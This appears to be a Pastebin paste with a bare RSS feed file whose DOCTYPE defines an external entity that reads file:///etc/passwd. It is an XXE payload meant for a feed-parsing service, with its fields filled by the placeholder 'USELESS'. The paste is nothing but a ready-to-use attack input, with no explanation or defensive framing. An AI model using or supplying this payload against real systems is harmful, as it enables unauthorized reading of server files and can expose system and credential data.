Advertisement
Guest User

Untitled

a guest
Apr 20th, 2019
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.39 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE foo [
  3. <!ELEMENT foo ANY >
  4. <!ENTITY xxe SYSTEM "file:///etc/passwd" >
  5. ]>
  6. <rss version="2.0">
  7.  
  8. <channel>
  9. <title>USELESS</title>
  10. <link>https://USELESS</link>
  11. <description>USELESS</description>
  12. <item>
  13. <title>USELESS</title>
  14. <link>https://USELESS</link>
  15. <description>USELESS</description>
  16. </item>
  17. </channel>
  18.  
  19. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement